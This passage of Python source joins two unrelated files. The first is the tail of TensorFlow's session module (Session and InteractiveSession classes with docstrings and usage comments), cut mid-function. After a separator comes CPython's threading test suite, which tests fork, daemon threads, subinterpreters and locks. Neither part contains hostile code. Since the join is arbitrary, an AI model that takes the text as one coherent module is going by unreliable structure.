tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
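# The TODO above notes that the public `Session.make_callable()` could be
# reimplemented on top of this method. A minimal sketch of the equivalent
# public-API usage is (illustrative only; tensor names are assumptions, not
# part of the original module):
#
#   sess = tf.compat.v1.Session()
#   x = tf.compat.v1.placeholder(tf.float32, shape=[])
#   y = x * 2.0
#   step = sess.make_callable(y, feed_list=[x])  # returns a Python callable
#   print(step(21.0))  # -> 42.0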
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
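# A minimal sketch of passing an explicit graph, as described in the
# constructor docstring above (illustrative only; names are assumptions):
#
#   g = tf.Graph()
#   with g.as_default():
#     c = tf.constant(42.0)
#   sess = tf.compat.v1.Session(graph=g)
#   print(sess.run(c))  # -> 42.0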
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all
of the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
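# A minimal usage sketch (illustrative only; the worker address and container
# name are assumptions):
#
#   tf.compat.v1.Session.reset('grpc://worker0:2222',
#                              containers=['experiment_scope'])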
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
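# A minimal sketch of supplying an explicit config instead of the interactive
# defaults above (illustrative only; the chosen options are assumptions):
#
#   config = tf.compat.v1.ConfigProto()
#   config.gpu_options.allow_growth = True
#   config.log_device_placement = True
#   sess = tf.compat.v1.InteractiveSession(config=config)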
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
_thread = import_module('_thread')
threading = import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
_thread.start_new_thread(f, ())
done.wait()
self.assertIsNotNone(ident[0])
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
# Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
self.addCleanup(t.join)
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
